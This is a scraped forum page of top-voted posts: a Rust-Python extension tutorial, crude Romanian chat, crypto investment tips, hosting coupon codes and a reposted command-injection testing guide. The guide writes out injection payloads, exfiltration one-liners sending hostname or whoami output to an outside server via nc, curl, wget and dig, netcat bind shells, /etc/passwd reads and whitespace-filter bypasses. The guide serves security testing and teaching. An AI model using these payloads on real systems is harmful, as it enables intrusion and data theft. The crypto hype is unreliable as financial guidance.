located. NOTE: on Fedora you must get a .so in other system you may get a .dylib and you can rename it changing extension to .so. $ cd .. $ ls doubles.py pyext-myrustlib/ $ cp pyext-myrustlib/target/release/libmyrustlib.so myrustlib.so $ ls doubles.py myrustlib.so pyext-myrustlib/ Having the myrustlib.so in the same folder or added to your Python path allows it to be directly imported, transparently as it was a Python module. Importing from Python and comparing the results Edit your doubles.py now importing our Rust implemented version and adding a benchmark for it. import re import string import random import myrustlib # <-- Import the Rust implemented module (myrustlib.so) def count_doubles(val): """Count repeated pair of chars ins a string""" total = 0 for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) def test_rust(benchmark): # <-- Benchmark the Rust version benchmark(myrustlib.count_doubles, val) Benchmark $ pytest doubles.py ============================================================================== platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_round rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 3 items doubles.py ... ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_rust 2.5555 (1.0) 2.9296 (1.0) 2.6085 (1.0) test_regex 25.6049 (10.02) 27.2190 (9.29) 25.8876 (9.92) test_pure_python 52.9428 (20.72) 56.3666 (19.24) 53.9732 (20.69) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Rust – 2.6085 <– less is better Regexp – 25.8876 Python Zip – 53.9732 Rust implementation can be 10x faster than Python Regex and 21x faster than Pure Python Version. Interesting that Regex version is only 2x faster than Pure Python 🙂 NOTE: That numbers makes sense only for this particular scenario, for other cases that comparison may be different. Updates and Improvements After this article has been published I got some comments on r/python and also on r/rust The contributions came as Pull Requests and you can send a new if you think the functions can be improved. Thanks to: Josh Stone we got a better implementation for Rust which iterates the string only once and also the Python equivalent. Thanks to: Purple Pixie we got a Python implementation using itertools, however this version is not performing any better and still needs improvements. Iterating only once fn count_doubles_once(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; let mut chars = val.chars(); if let Some(mut c1) = chars.next() { for c2 in chars { if c1 == c2 { total += 1; } c1 = c2; } } Ok(total) } def count_doubles_once(val): total = 0 chars = iter(val) c1 = next(chars) for c2 in chars: if c1 == c2: total += 1 c1 = c2 return total Python with itertools import itertools def count_doubles_itertools(val): c1s, c2s = itertools.tee(val) next(c2s, None) total = 0 for c1, c2 in zip(c1s, c2s): if c1 == c2: total += 1 return total New Results ------------------------------------------------------------------------------- Name (time in ms) Min Max Mean ------------------------------------------------------------------------------- test_rust_once 1.0072 (1.0) 1.7659 (1.0) 1.1268 (1.0) test_rust 2.6228 (2.60) 4.5545 (2.58) 2.9367 (2.61) test_regex 26.0261 (25.84) 32.5899 (18.45) 27.2677 (24.20) test_pure_python_once 38.2015 (37.93) 43.9625 (24.90) 39.5838 (35.13) test_pure_python 52.4487 (52.07) 59.4220 (33.65) 54.8916 (48.71) test_itertools 58.5658 (58.15) 66.0683 (37.41) 60.8705 (54.02) ------------------------------------------------------------------------------- The new Rust implementation is 3x better than the old, but the python-itertools version is even slower than the pure python After adding the improvements to iterate the list of chars only once, Rust still has advantage from 1.1268 to 39.583 Conclusion Rust may not be yet the general purpose language of choice by its level of complexity and may not be the better choice yet to write common simple applications such as web sites and test automation scripts. However, for specific parts of the project where Python is known to be the bottleneck and your natural choice would be implementing a C/C++ extension, writing this extension in Rust seems easy and better to maintain. There are still many improvements to come in Rust and lots of others crates to offer Python <--> Rust integration. Even if you are not including the language in your tool belt right now, it is really worth to keep an eye open to the future! References The code snippets for the examples showed here are available in GitHub repo: https://github.com/rochacbruno/rust-python-example. The examples in this publication are inspired by Extending Python with Rust talk by Samuel Cormier-Iijima in Pycon Canada. video here: Also by My Python is a little Rust-y by Dan Callahan in Pycon Montreal. video here: Other references: https://github.com/mitsuhiko/snaek https://github.com/PyO3/pyo3 https://pypi.python.org/pypi/setuptools-rust https://github.com/mckaymatt/cookiecutter-pypackage-rust-cross-platform-publish http://jakegoulding.com/rust-ffi-omnibus/ https://github.com/urschrei/polylabel-rs/blob/master/src/ffi.rs https://bheisler.github.io/post/calling-rust-in-python/ https://github.com/saethlin/rust-lather Join Community Join Rust community, you can find group links in https://www.rust-lang.org/en-US/community.html. If you speak Portuguese, I recommend you to join https://t.me/rustlangbr and there is the http://bit.ly/canalrustbr on Youtube. Author Bruno Rocha Senior Quality Engineer at Red Hat Teaching Python and Flask at CursoDePython.com.br Fellow Member of Python Software Foundation Member of RustBR study group M0ore info: http://about.me/rochacbruno and http://brunorocha.org Source
  19. 4 points
    https://explainshell.com/
  20. 4 points
    @robert2alin in continuare la https://rstforums.com/forum/topic/107079-iphone-8-blacklist/?do=findComment&comment=655986 asta am rezolvat. Spor!
  21. 4 points
    Hackerii pizdii, viitorii asistati social... pune-n plm mana pe carte si lasa prostiile. Magazin online? vezi sa nu primesti ceva de sezon:
  22. 4 points
    Scuza buna pentru nevasta cand te prinde vorbind cu amanta Vocile bre.. vocile.. #WeAreLegionForWeAreMany
  23. 4 points
    daca iti producea 50k doar din links nu o vindeai
  24. 4 points
  25. 3 points
    Cine dreq se uita la copii care fac galagie? Ca plafon de skill e vaza si nu e frumos de vizionat ca un meci professional. (git gud kid) Ca entertainment e si mai varza. 5 copii care fac galagie intr-un microfon la 3 lei din piata. Nici amuzant nu esti, nici calitate audio nici calitate ca skill in gameplay. Daca vrei sa fii youtuber orienteaza-te pe alt segment sau incearca sa faci lucruri mult mai originale.
  26. 3 points
    https://www.ripstech.com/php-security-calendar-2017/
  27. 3 points
    IOTA mai are mult de mers in sus. Recomand! Sunt seriosi si au parteneriate cu multe companii. Imi apare asemanatoare situatia cu early days ETH. Am luat initial la 16k satoshi, am vandut la 35k si acum caut sa iau iar pentru ca se pare ca s-a stabilizat pe la 24k satoshi. Incerc sa acumulez si BAT cand sunt dips pentru ca e pret foarte mic momentan si proiectul e super misto. In plus, Brave browser se misca excelent. Easy 10x in cateva luni.
  28. 3 points
  29. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  30. 3 points
    Mai pe scurt, toti cei care detin monezi NXT vor primi GRATUIT jumate din numarul lor in noua moneda care se va lansa si se va numi IGNIS. Eu unul am investit ceva banuti pentru a prinde valul (actiunea se va intampla de Craciun) si o vad ca pe o oportunitate buna sa fac ceva profit (toata smecheria ii sa stii cand sa te opresti). Cam asa arata evolutia in ultimele 2 zile a monezii NXT: Mai multe detalii gasiti aici: https://www.jelurida.com/ico
  31. 3 points
    de ce sa nu mergi la politie sa faci o plangere si ei sunt obligati sa faca ancheta etc. (sau daca nu te indurma ce sa faci si cum). daca te bagi tu sa desfaci telefonul sau sa verifici software-ul risti sa distrugi din dovezi. PS: Situatia descrisa de tine cade sub un proces PENAL si nu CIVIL. Adica e treaba politiei si nu teaba ta cu avocati. Off: Mama cat s-au inmultit telenovelele pe forumul asta. Nu trece o saptamana fara un topic cu inselari, divortari, tradari, ascultari, spionari. Mai ceva ca Ochii din Umbra.
  32. 3 points
    pula mea, eu am fost sa ma inscriu in organizatii de voluntariat, ceea ce am observat este ca, orice lucru fac, ei trebuie sa faca un after party dupa ce au facut acel ceva faci o competitie? pai trebuie sa facem clar si un after party. cum pula mea sa ne mearga bine ca colectiv, cand noi gandim intr-un mod subiectiv si ne pasa doar ne noi.
  33. 3 points
    Mie îmi place cu finalizare. 😏
  34. 3 points
    "Real smart contracts" "20 000 TPS" "More info soon" Cam suna a scam. Daca faci astfel de promisiuni fara sa pui macar o idee de specificatie sau validare a "blockchainului" tau. Scuze de offtopic. Doar cred ca suna prea bine sa fie ceva real. Edit: Daca le citesti whitepaperul observi ca toate nodurile din retea sunt detinute de ei, iar un nod trebuie sa fie validat si semnat de ei. Deci s-a dus pe pl descentralizarea si valoarea monedei cand toate nodurile sunt detinure de ei. Ps: ei pot rescrie blockchainul daca au chef. In plus softwareul nu e open source.
  35. 3 points
    A command injection is a class of vulnerabilities where the attacker can control one or multiple commands that are being executed on a system. This post will go over the impact, how to test for it, defeating mitigations, and caveats. Before diving into command injections, let’s get something out of the way: a command injection is not the same as a remote code execution (RCE). The difference is that with an RCE, actual programming code is executed, whereas with a command injection, it’s an (OS) command being executed. In terms of possible impact, this is a minor difference, but the key difference is in how you find and exploit them. Setting up Let’s start by writing two simple Ruby scripts that you can run locally to learn finding and exploiting command injection vulnerabilities. I used Ruby 2.3.3p222. Below is ping.rb. puts `ping -c 4 #{ARGV[0]}` This script will ping the server that’s being passed to the script as argument. It will then return the command output on the screen. Example output below. $ ruby ping.rb '8.8.8.8' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=23.653 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=9.111 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=8.571 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=20.565 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.571/15.475/23.653/6.726 ms As you can see, it executed ping -c 4 8.8.8.8 and displayed the output on the screen. Here’s another script that will be used in the blog post: server-online.rb. puts `ping -c 4 #{ARGV[0]}`.include?('bytes from') ? 'yes' : 'no' This script will determine whether the server is online based on an ICMP response (ping). If it responds to the ping request, it’ll display yes on the screen. In case it doesn’t, it’ll display no. The output of the command isn’t returned to the user. Example output below. $ ruby server-on.rb '8.8.8.8' yes $ ruby server-on.rb '8.8.8.7' no Testing One of the best ways to detect a first-order command injection vulnerability is trying to execute a sleep command and determine if the execution time increases. To start with this, let’s establish a time baseline for the ping.rb script: $ time ruby ping.rb '8.8.8.8' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... 0.09s user 0.04s system 4% cpu 3.176 total Notice that executing script takes about 3 seconds. Now let’s determine if the script is vulnerable to a command injection by injecting a sleep command. $ time ruby ping.rb '8.8.8.8 && sleep 5' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... 0.10s user 0.04s system 1% cpu 8.182 total The script will now execute the command ping -c 4 8.8.8.8 && sleep 5. Notice the execution time again: it jumped from ~3 seconds to ~8 seconds, which is an increase of exactly 5 seconds. There can still be unexpected delays on the internet, so it’s important to repeat the injection and play with the amount of seconds to make sure it’s not a false positive. Let’s determine whether the server-online.rb script is vulnerable, too. $ time ruby server-online.rb '8.8.8.8' yes 0.10s user 0.04s system 4% cpu 3.174 total $ time ruby server-online.rb '8.8.8.8 && sleep 5' yes 0.10s user 0.04s system 1% cpu 8.203 total Again, the baseline shows executing a normal request takes about 3 seconds. Adding && sleep 5 to the command increases the time to 8 seconds. Depending on the command being executed, the sleep command may be injected differently. Here are a few payloads that you can try when looking for command injections (they all work): time ruby ping.rb '8.8.8.8`sleep 5`' When a command line gets parsed, everything between backticks is executed first. Executing echo `ls` will first execute ls and capture its output. It’ll then pass the output to echo, which displays the output of ls on the screen. This is called command substitution. Since execution of the command between backticks takes precedence, it doesn’t matter if the command executed afterwards fails. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8`sleep 5` sleep command executed, command substitution works in command line. ping -c 4 "8.8.8.8`sleep 5`" sleep command executed, command substitution works in complex strings (between double quotes). ping -c 4 $(echo 8.8.8.8`sleep 5`) sleep command executed, command substitution works in command substitution when using a different notation (see example below). ping -c 4 '8.8.8.8`sleep 5`' sleep command not executed, command substitution does not work in simple strings (between single quotes). ping -c 4 `echo 8.8.8.8`sleep 5`` sleep command not executed, command substitution does not work when using the same notation. time ruby ping.rb '8.8.8.8$(sleep 5)' This is a different notation for command substitution. This may be useful when backticks are filtered or encoded. When using command substitution to look for command injections, make sure to test both notations to avoid true-negatives in case the payload is already being substituted (see last example in table above). time ruby ping.rb '8.8.8.8; sleep 5' Commands are executed in a sequence (left to right) and they can be separated with semicolons. When a command in the sequence fails it won’t stop executing the other commands. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8;sleep 5 sleep command executed, sequencing commands works when used on the command line. ping -c 4 "8.8.8.8;sleep 5" sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 $(echo 8.8.8.8;sleep 5) sleep command executed, sequencing commands works in command substitution. ping -c 4 '8.8.8.8;sleep 5' sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 `echo 8.8.8.8;sleep 5` sleep command executed, sequencing commands works in command substitution. time ruby ping.rb '8.8.8.8 | sleep 5' Command output can be piped, in sequence, to another commands. When executing cat /etc/passwd | grep root, it’ll capture the output of the cat /etc/passwd command and pass it to grep root, which will then show the lines that match root. When the first command fail, it’ll still execute the second command. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8 | sleep 5 sleep command executed, piping output works when used on the command line. ping -c 4 "8.8.8.8 | sleep 5" sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 $(echo 8.8.8.8 | sleep 5) sleep command executed, piping output works in command substitution. ping -c 4 '8.8.8.8 | sleep 5' sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 `echo 8.8.8.8 | sleep 5` sleep command executed, piping output works in command substitution. Exploiting To exploit the vulnerability for evidence is to determine whether it’s a generic or blind command injection. The difference between the two, is that a blind command injection doesn’t return the output of the command in the response. A generic command injection would return the output of the executes command(s) in the response. The sleep command is often a good proof of concept for either flavor. However, if you need more proof, execute id, hostname, or whoami and use the output as additional proof. The server’s hostname is useful to determine how many servers are affected and help the vendor to get a sense of impact faster. Important: needless to say, most companies don’t appreciate you snooping around on their systems. Before exploiting the vulnerability to pivot into something else, ask permission to the company. In nearly all situations proving that executing arbitrary but harmless commands like sleep, id, hostname or whoami is enough to proof impact to the affected company. Exploiting generic command injection This is usually pretty straightforward: the output of any injected command will be returned to the user: $ ruby ping.rb '8.8.8.8 && whoami' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.008 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=8.572 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=9.309 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=9.005 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.572/8.973/9.309/0.263 ms jobert The red part shows the output of the ping command. The green text the output of the whoami command. From this point, you can gather evidence for your proof of concept. Again, stick to harmless commands. Exploiting blind command injection With blind command injections the output isn’t returned to the user, so we should find other ways to extract the output. The most straightforward technique is to offload the output to your server. To simulate this, run nc -l -n -vv -p 80 -k on your server and allow inbound connections on port 80 in your firewall. Once you’ve set up the listener, use nc, curl, wget, telnet, or any other tool that sends data to the internet, to send the output to your server: $ ruby server-online.rb '8.8.8.8 && hostname | nc IP 80' yes Then observe a connection being made to your server that shows the output of the hostname command: $ nc -l -n -vv -p 80 -k Listening on [0.0.0.0] (family 0, port 81) Connection from [1.2.3.4] port 80 [tcp/*] accepted (family 2, sport 64225) hacker.local In the example above, nc is used to send the output of the command to your server. However, nc might be deleted or unable to execute. To avoid going down a rabbit hole, there are a few simple payloads to determine if a command exists. In case any of the commands increase the time with 5 seconds, you know the command exists. curl -h && sleep 5 wget -h && sleep 5 ssh -V && sleep 5 telnet && sleep 5 When you’ve determined a command exists, you can use any of those commands to send the output of a command to your server, like this: whoami | curl http://your-server -d @- wget http://your-server/$(whoami) export C=whoami | ssh user@your-server (setup the user account on your-server to authenticate without a password and log every command being executed) Even though the server-online.rb script doesn’t output the result of the hostname command, the output can be sent to a remote server and obtained by an attacker. In some cases, outbound TCP and UDP connections are blocked. It’s still possible to extract the output in that case, we just have to do a little bit more work. In order to extract the output, we have to guess the output based on something that we can change. In this case, the execution time can be increased using the sleep command. This can be used to extract the output. The trick here is to pass the result of a command to the sleep command. Here’s an example: sleep $(hostname | cut -c 1 | tr a 5). Let’s analyze this for a moment. It’s executing the hostname command. Let’s assume it returns hacker.local. It’ll take that output and pass it to cut -c 1. This will take the first character of hacker.local, which is the character h. It passes it to tr a 5, which will replace the character a with a 5 in the output of the cut command (h). The output of the tr command is then passed to the sleep command, resulting in sleep h being executed. This will immediately error, since sleep can only take a number as first argument. The goal is then to iterate over the characters with the tr command. Once you execute sleep $(hostname | cut -c 1 | tr h 5), the command will take 5 seconds longer to execute. This is how you determine that the first character is an h. Once you guessed a character, increase the number you pass to the cut -c command, and repeat. Here’s a table with the commands to determine the output: Command Time Result ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr a 5)' 3s - ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr h 5)' 8s h ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 2 | tr a 5)' 8s a ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr a 5)' 3s - ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr c 5)' 8s c To determine how many characters you need to guess: pipe the output of hostname to wc -c and pass that to the sleep command. hacker.local is 12 characters. The hostname command returns the hostname and a new line, so wc -c will return 13. We established that normally, the script takes 3 seconds to complete. $ time ruby server-online.rb '8.8.8.8 && sleep $(hostname | wc -c)' yes 0.10s user 0.04s system 0% cpu 16.188 total The payload above shows that the script now takes 16 seconds to complete, which means the output of hostname is 12 characters: 16 - 3 (baseline) - 1 (new line) = 12 characters. When executing this payload on a web server, know that the output may change: the length of the hostname could change when requests are handled by different servers. The technique above works fine for smaller outputs, but can take a long time for reading a file. Some of the following methods can be pretty intrusive, so always make sure the company gave you a thumbs up to use more invasive extraction methods. In case outbound connections are blocked and the output is too long to read, here are a few other tricks to try (useful during CTFs): Run a port scan on the server and based on the exposed services, determine a way to extract the output. FTP: try writing the file to a directory you can download files from. SSH: try writing the output of the command to the MOTD banner, then simply SSH to the server. Web: try writing the output of the command to a file in a public directory (/var/www/). Spawn a shell on a port that can be reached from the outside (only available in custom netcat build): nc -l -n -vv -p 80 -e /bin/bash (unix) or nc -l -n -vv -p 80 -e cmd.exe (windows). Do a DNS query with dig or nslookup to send the output to port 53 (UDP): dig `hostname` @your-server or nslookup `hostname` your-server. Output can be captured with nc -l -n -vv -p 53 -u -k on your server. This may work because outbound DNS traffic is often allowed. Check out this tweet how to offload file contents with dig. Change the ICMP packet size when pinging your server to offload data. tcpdump can be used to capture the data. Check out this tweet how to do this. There’s plenty of other ways, but it often depends on what kind of options the servers gives you. The technique shown above are most common when exploiting command injection vulnerabilities. The key is to use what you have to extract the output! Defeating mitigations Sometimes mitigations have been put in place, which may cause the above techniques not to work. One of the mitigations that I’ve seen over the years, is a restriction on whitespace in the payload. Luckily, there’s something called Brace Expansion that can be used to create payloads without whitespace. Below is ping-2.rb, which is the second version of ping.rb. Before passing the user input to the command, it removes whitespace from the input. puts `ping -c 4 #{ARGV[0].gsub(/\s+?/,'')}` When passing 8.8.8.8 && sleep 5 as argument, it’d execute ping -c 4 8.8.8.8&&sleep5, which will result in an error showing that the command sleep5 isn’t found. There’s an easy workaround by using brace expansion: $ time ruby ping-2.rb '8.8.8.8;{sleep,5}' ... 0.10s user 0.04s system 1% cpu 8.182 total Here’s a payload that sends the output of a command to an external server without using whitespace: $ ruby ping.rb '8.8.8.8;hostname|{nc,192.241.233.143,81}' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... Or to read /etc/passwd: $ ruby ping.rb '8.8.8.8;{cat,/etc/passwd}' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.215 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=10.194 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=10.171 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=8.615 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.615/9.549/10.194/0.668 ms ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. ... Whenever a command is being executed with user input mitigations have to be put in place by the developer. Developers take different routes to implement mitigations, so it’s up to you to discover what they did and how to work around them. Happy hacking! Jobert. Source :
  36. 3 points
    This talk was performed on 7 July 2017 at Camp++ 0x7e1, MKV downloads and presentation slides are available at https://camp.hsbp.org/2017/pp7e1/fahrplan/events/31.html
  37. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  38. 3 points
    Te-a luat de prost, si te-a prostit si mai tare.Da-i un sut in cur si divorteaza, sigur vei gasi 100 de alte "pisi" ca ea pe care sa le plimbi cu meleul.
  39. 3 points
    In caz ca vrei sa te asiguri ca aspectul amoros al vietilor voastre este in concordanta cu cel social, recomand:
  40. 3 points
    Oferta de la Shodan, upgrade lifetime cont premium pentru 5$, in loc de 49$, Include: -all add-ons (HTTPS, Telnet, up to 10000 search results) - 20 export credits - Shodan maps, images, command-line - free copy of Shodan book
  41. 3 points
    A A2 Hosting HUGE67 CMVPS RSL40 67% off – Shared Hosting / 50% off – Managed & Core VPS / 40% off – Reseller Hosting Nov 23 Nov 27 Order Now AdroitSSD (Link Activation) 67% off – All Hosting Plans for first invoice. Nov 24 Dec 16 Order Now AltusHost (Link Activation) 50% off (first 3 months) – Shared & VPS Hosting. Nov 24 Nov 27 Order Now B BGOcloud Order Now BigScoots Order Now Blazing Fast Host BLACKFRIDAY70 BLACKFRIDAY50 BLACKFRIDAY40 70% lifetime discount – Shared & Reseller Hosting (annual plan) / 50% off – Cloud & VPS Hosting / 40% off – Shared & Reseller Hosting (any subscription term). Now Nov 29 Order Now BlueHost (Link Activation) $2.65/mo – Basic Shared Hosting (36-mo) Nov 25 Nov 27 Order Now BulwarkHost Order Now BuzzMe Internet BIG50 50% off – Shared hosting. Nov 20 Nov 30 Order Now C Cloudways BF150 Free $150 hosting credits Nov 22 Dec 11 Order Now Codero Order Now Cloudngin Order Now Cloudpap Inc Order Now CuroWeb CYBER25 25% off – All Managed WordPress Hosting. Nov 27 Dec 1 Order Now D Dazzling BF52OFF BF10OFF 52% off – Shared Hosting & Reseller Hosting / 10% OFF – VPS & Dedicated Servers Now Dec 10 Order Now Dollar1Hosts DOLLARBFOT40 DOLLARBFRD25 DOLLARBFVD15 40% off – Linux Shared & Reseller Hosting plan / 25% lifetime discount – Golden and Platinum Hosting / 15% lifetime recurring discount – VPS & Dedicated Hosting. Order Now DTS-Net WHSR50 50% off – All Hosting plans. Now Nov 31 Order Now E eHost Order Now eUKhost HW20DS BACKUP50 20% off – SSD Dedicated Hosting / 31% off – Remote Backups Now Nov 30 Order Now Evolve DOMAIN30 SHARED40 SSL30 30% off – Domain Registration / 40% off – Shared Hosting / 30% off – SSL Now Nov 30 Order Now F FastComet BLACK30 SERVER30 30 % off – Shared Hosting / 30% Off VPS & Dedicated Hosting. Nov 22 Nov 28 Order Now Fast Web Host (Link Activation) 70% off – Shared Hosting / 60% off – VPS Hosting. Nov 26 Nov 30 Order Now Fixus Host BLACKFRIDAY 60% off – All Shared Hosting (quarterly / yearly subscription). Now Dec 31 Order Now FlyWheel Order Now G Gigenet Order Now GlowHost BF50ELASTIC BF30SHARED BLACKCYBERDEDI 50% off – Elastic Sites Packages / 30% off – Shared Packages / 50% off & second month free – Dedicated Hosting. Nov 24 Nov 24 Order Now GreenGeeks (Link Activation) $2.95/mo – Shared Hosting (36-mo) Nov 24 Nov 27 Order Now GoatCloud Order Now Go Get Space Order Now H Hawk Host BFSHARED2017 BFSD2017 BFVPS2017 70% off – Shared Hosting / 70% off – Semi Dedicated Hosting / 60% off – VPS Hosting. Nov 23 Nov 26 Order Now Host 1 Plus CYBERECLIPSE 50% off – Cloud & VPS Hosting, 1-3 month billing cycles. Nov 20 Nov 27 Order Now Host Bazzar BLACKFRIDAYSHOT BLACKFRIDAYSSOT BLACKFRIDAYAHOT 41% off – Linux & SSD Reseller Hosting / 41% off – Linux & SSD Shared Hosting / 431% off – Linux Application Hosting Nov 20 Dec 31 Order Now HostColor BFCLOUD 30% off – Any Public Clouds Nov 24 Nov 25 Order Now Hostgator (Link Activation) 65% off + $5.99 domains – All hosting plans / Flash sales goes up to 80% discount, check official site for more details. Nov 23 Nov 28 Order Now Hostinger (Link Activation) Up to 90% off – Shared Hosting Now Nov 30 Order Now Hoo.st Order Now HostPapa Order Now Host Sailor BLKFRDLET BLKFRDLET40 LEBVPN40 50% off -lifetime discount – VPS Hosting / 40% off – lifetime discount – VPS Hosting(semi-yearly) / 40% off – VPN (yearly) Nov 25 Dec 31 Order Now Host Slayer Order Now HostVPS BLACKFRIDAY 50% off – VPS Hosting located in Spain. Nov 24 Nov 24 Order Now I InMotion Hosting (Link Activate) $2.95/mo – Shared Hosting. Now – Order Now Insight Hosting BLACKFRIDAY75 BLACKFRIDAY25 75% lifetime discount – Shared & Reseller Hosting / 25% life time discount – Cloud, VPS & Dedicated Hosting. Now Nov 27 Order Now Interserver (Link Activate) 50% off – Shared & VPS Hosting. Nov 24 Nov 27 Order Now iPage Order Now J Jolt BLACKFRIDAY 75% off – All Shared & Reseller Hosting. Nov 24 Nov 27 Order Now K Kickassd WHSR50FRIDAY 50% off – All annual hosting plans. Nov 24 Nov 25 Order Now L LFC Hosting LFCBLACKFRIDAY 10% lifetime discount – Weebly Site Builder, Shared Hosting, & Unmanaged SSD VPS Hosting. Nov 16 Dec 31 Order Now Liquid Web Order Now LittleBizzy BLACKFRIDAY Free SFTP + SSL + MailGun on any new Business Hosting (or above) Plans. Now Nov 30 Order Now M M3 Server Order Now Media Temple Order Now MightWeb BF2017WEB BF2017VPS BF2017RESELLER 50 % off – Shared Hosting / 40% off – VPS Hosting / 30% off – Reseller Hosting. Nov 21 Nov 30 Order Now MilesWeb BF2017 75% off – Shared Hosting, VPS and Reseller Hosting. Now Nov 25 Order Now N NameCheap (Link Activation) Up to 99% off – Domain Names. Nov 24 – Order Now Nethosting Order Now Netmoly Order Now O One.com (Link Activation) $0.25/mo shared hosting. Now – Order Now OrangeWebsite Order Now P Philmorehost 20OFFALL 20% off – Shared, VPS, & Dedicated Hosting Now Dec 31 Order Now Pressable GREENFRIDAY 25% off – 5, 10, 20 Sites Plan. Now Nov 27 Order Now PreWebHost PREWEB2017OT PREWEB2017LT PREWEBBFVDR 60% off Linux Shared & Reseller Hosting / 40% lifetime discount – Linux shared and reseller hosting / 30% lifetime discount – annual VPS & Dedicated Hosting Now Dec 10 Order Now PreWebHost India BFDEALINDIA 50% life time discount – Linux Reseller & Shared Hosting Now Dec 10 Order Now R RainHost 3 months free usage of all of paid features Nov 25 Nov 28 Order Now ResellerClub BLACKFRIDAY 55% off – Shared Hosting, Cloud Hosting and Reseller Hosting plans Now Nov 27 Order Now Rose Hosting RHBF17 50% off – Managed Linux VPS Hosting for the first 6 months. Now Dec 1 Order Now S ServerPilot (Link Activation) Order Now Server Point (Link Activation) 35% off + free domain& Weebly site builder Now Dec 31 Order Now SLU Hosting BF2OFF 2 months free with 1 year Bronze Shared Hosting. Nov 23 Now 30 Order Now SiteGround (Link Activate) 70% off – All Shared Hosting Nov 24 Nov 28 Order Now Spiral Hosting Order Now Squirrel Hosting Order Now SSD Cloud BLACKFRIDAY40 BLACKFRIDAY75 BLACKFRIDAY90 40% off first month – VPS & Dedicated Hosting / 75% lifetime discount – Shared & Reseller Hosting / 90% off – All Shared & Reseller Hosting Now Nov 29 Order Now StackPress SAVE70 – – 70% off – WordPress Hosting plans for six months. Nov 24 Nov 28 Order Now T Temok BLACKFRIDAY2017 40% off + free domain – All hosting plans Nov 10 Dec 8 Order Now TMD Hosting (Link Activation) Up to 78% off on shared and VPS hosting plans. Managed SSD hosting starts at $1.99/mo. Now – Order Now TrueHost Cloud Order Now Turnkey Internet (Link Activation) Up to 95% off – Dedicated Servers / 75% off – VPS Cloud Servers / 90% off – Shared Hosting Nov 13 – Order Now U UK2.net (Link Activation) 40% off – WordPress Hosting / Free 12 months – Shared Hosting Nov 20 Nov 30 Order Now Umbrella Host WHSRBLACKFRIDAY 50% off – Linux Hosting, 6 months. Now Nov 27 Order Now Unlimited Web Hosting UK HOSTINGBF2017 DOMAINSBF2017 SSLBF2017 20% off first month – all hosting products / 20% off first year – New Domain Name / 20% off first year – new SSL Certificate. Now Nov 27 Order Now USH Internet BIG70BLACKFRIDAY 70% off – All Shared Hosting. Now Nov 30 Order Now V Volarus Hosting Order Now W Web Host Face FACESPECIAL 90 % off – All Shared Hosting Now – Order Now Web Hosting Pad (Link Activation) Upgrade Hosting Plans at the introductory rates. Nov 20 Dec 31 Order Now Web Host Pro WHSRBF17 50% off – Shared & Reseller Hosting (annual subscription). Now Nov 30 Order Now Web Hosting Pros Order Now Web Host UK BLACKFRIDAY50 BLACKFRIDAY 50% off – Shared & Reseller Hosting / 20% off – VPS & Dedicated Hosting Now Dec 31 Order Now Web Hosting UK BF50OFF SECURE25 50% off -Cpanel and Windows Hosting / £49.99 – Dedicated Hosting Now Nov 30 Order Now WebHostingBuzz Order Now Web Hosting Hub (Link Activate) $1.95/mo hosting for first 3 months. Now – Order Now WireNine BF2017 70% off – All web hosting plans. Nov 24 Nov 27 Order Now WP Engine CYBERWPE35 35% off first month – All WP Engine Hosting Nov 22 Nov 30 Order Now
  42. 3 points
    iti cumpar eu site-ul daca imi dai si profilul fetei din screen
  43. 3 points
